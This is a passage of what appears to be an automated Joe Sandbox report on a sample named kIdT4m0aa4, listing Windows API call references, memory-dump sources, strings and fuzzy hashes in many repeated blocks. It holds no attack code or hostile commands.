                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5566987519b71ef7e774841d93a8c1c6646147044e8beeac51355f7f0b77709b
                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                            • Opcode Fuzzy Hash: 5566987519b71ef7e774841d93a8c1c6646147044e8beeac51355f7f0b77709b
                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0ce9e03acd2583b185641c2a54a4d00dc50c68018bfb738a5e05145523d0ecd2
                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                            • Opcode Fuzzy Hash: 0ce9e03acd2583b185641c2a54a4d00dc50c68018bfb738a5e05145523d0ecd2
                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • SetEndOfFile.KERNELBASE(?,00CC903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00CC9F0C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNELBASE(?,00CDAE72,C:\Users\user\Desktop,00000000,00D0946A,00000006), ref: 00CDAC08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            APIs
                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CDC2B1
                                                            • EndDialog.USER32(?,00000006), ref: 00CDC2C4
                                                            • GetDlgItem.USER32(?,0000006C), ref: 00CDC2E0
                                                            • SetFocus.USER32(00000000), ref: 00CDC2E7
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CDC321
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CDC358
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00CDC36E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDC38C
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDC39C
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CDC3B8
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CDC3D4
                                                            • _swprintf.LIBCMT ref: 00CDC404
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CDC417
                                                            • FindClose.KERNEL32(00000000), ref: 00CDC41E
                                                            • _swprintf.LIBCMT ref: 00CDC477
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CDC48A
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CDC4A7
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CDC4C7
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDC4D7
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CDC4F1
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CDC509
                                                            • _swprintf.LIBCMT ref: 00CDC535
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CDC548
                                                            • _swprintf.LIBCMT ref: 00CDC59C
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CDC5AF
                                                              • Part of subcall function 00CDAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CDAF35
                                                              • Part of subcall function 00CDAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00CFE72C,?,?), ref: 00CDAF84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                            • API String ID: 797121971-1840816070
                                                            • Opcode ID: 093e697d8b5164016319e11279baa81396c80c1cf3f953fce81c6f72e0ece437
                                                            • Instruction ID: cd1ebc94a721000d9124942cb92c8d98a5a3b800f47e1a861e9cf47a160ac87d
                                                            • Opcode Fuzzy Hash: 093e697d8b5164016319e11279baa81396c80c1cf3f953fce81c6f72e0ece437
                                                            • Instruction Fuzzy Hash: 6391A172248349BBD2219BA0DC89FFB77ACEB5A700F04481AF749C2181DB75A605DB72
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC6FAA
                                                            • _wcslen.LIBCMT ref: 00CC7013
                                                            • _wcslen.LIBCMT ref: 00CC7084
                                                              • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                              • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                              • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                              • Part of subcall function 00CCA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641,000000FF), ref: 00CCA1F1
                                                              • Part of subcall function 00CCA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641), ref: 00CCA21F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CC7139
                                                            • CloseHandle.KERNEL32(00000000), ref: 00CC7155
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CC7298
                                                              • Part of subcall function 00CC9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CC73BC,?,?,?,00000000), ref: 00CC9DBC
                                                              • Part of subcall function 00CC9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CC9E70
                                                              • Part of subcall function 00CC9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00CC95D6,?,?,?,?,?,00CF2641,000000FF), ref: 00CC963B
                                                              • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                              • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                            Strings
                                                            Similarity
                                                            • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 2821348736-3508440684
                                                            • Opcode ID: 02e0cdc03e4c0363db78849456b2500bfe74d8e347233974e3f66c8efda39bf1
                                                            • Instruction ID: 95114e75acfa216c9d21595b95490e12a13a6a2cf4e48eda25aeede841d1bbb5
                                                            • Opcode Fuzzy Hash: 02e0cdc03e4c0363db78849456b2500bfe74d8e347233974e3f66c8efda39bf1
                                                            • Instruction Fuzzy Hash: FCC10771904644AADB21EB74CC45FFEB3A8EF04300F04465EFA5AE7282DB34AB44DB61
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: 2470b02a89061878f4bd2fd56a9f528e6c2943b60a93d87a0da8c2f193374240
                                                            • Instruction ID: d7b4d547dd0cb42a2ab54b640686fe24ef419c251bc29d0d9245466d2fbaa64b
                                                            • Opcode Fuzzy Hash: 2470b02a89061878f4bd2fd56a9f528e6c2943b60a93d87a0da8c2f193374240
                                                            • Instruction Fuzzy Hash: B4C26C72E086688FDB25CF2ADD407EAB7B5EB44344F1541EAD45EE7280E774AE818F40
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: H_prolog_swprintf
                                                            • String ID: CMT$h%u$hc%u
                                                            • API String ID: 146138363-3282847064
                                                            • Opcode ID: 8aee816759c7e97a35f6b288c3751c52dc71966fe4707b871556770954766e9f
                                                            • Instruction ID: b4e371493b3eaecfb67e080f6a341349a5700cbe6da2c8a11302c1ae45bad27d
                                                            • Opcode Fuzzy Hash: 8aee816759c7e97a35f6b288c3751c52dc71966fe4707b871556770954766e9f
                                                            • Instruction Fuzzy Hash: BD32C371510384ABDF18DF74C895FE93BA5AF15300F08447EFD9A8B282DB749A49DB60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC2874
                                                            • _strlen.LIBCMT ref: 00CC2E3F
                                                              • Part of subcall function 00CD02BA: __EH_prolog.LIBCMT ref: 00CD02BF
                                                              • Part of subcall function 00CD1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CCBAE9,00000000,?,?,?,00010456), ref: 00CD1BA0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC2F91
                                                            Strings
                                                            Similarity
                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                            • String ID: CMT
                                                            • API String ID: 1206968400-2756464174
                                                            • Opcode ID: ca1932151c833f6bc537fc1cbd695a794207c30092c3c359978f2865b65e50c1
                                                            • Instruction ID: 24fb1c7222b9835cfd24726184c91ee2a04b0024a47753a05fe04976cb6ef7d9
                                                            • Opcode Fuzzy Hash: ca1932151c833f6bc537fc1cbd695a794207c30092c3c359978f2865b65e50c1
                                                            • Instruction Fuzzy Hash: 9F6207715002858FDF19DF78C895FEA3BA1EF54300F08857EECAA8B282D7759A45DB60
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CDF844
                                                            • IsDebuggerPresent.KERNEL32 ref: 00CDF910
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CDF930
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00CDF93A
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 7cf94cbc9fc8af74227aca1d3c7f7dbc9681c427b025e67e83f0adc2bd57c167
                                                            • Instruction ID: 6fcebeddfc2d6d0ae72d75bc2219cba86a1bef691bc648703e298b4e918354f1
                                                            • Opcode Fuzzy Hash: 7cf94cbc9fc8af74227aca1d3c7f7dbc9681c427b025e67e83f0adc2bd57c167
                                                            • Instruction Fuzzy Hash: 9A310575D05219ABDB21DFA4D989BCCBBB8BF08304F1040AAE50DAB350EB719B85DF45
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,00CDE5E8,0000001C,00CDE7DD,00000000,?,?,?,?,?,?,?,00CDE5E8,00000004,00D21CEC,00CDE86D), ref: 00CDE6B4
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CDE5E8,00000004,00D21CEC,00CDE86D), ref: 00CDE6CF
                                                            Strings
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            • Opcode ID: 94f96072df3cf765b2baa05dc1aa45b6768562f803a3e4a90b6aa93d91978387
                                                            • Instruction ID: f26e6ca273113e2141d5a8a97f57c9286f3e72418a144a8afff28d1bdc046691
                                                            • Opcode Fuzzy Hash: 94f96072df3cf765b2baa05dc1aa45b6768562f803a3e4a90b6aa93d91978387
                                                            • Instruction Fuzzy Hash: AF01DB726001096BDF14EE29DC49BED7BBAEFC4324F0DC125EE69DB254D634DA05C690
                                                            APIs
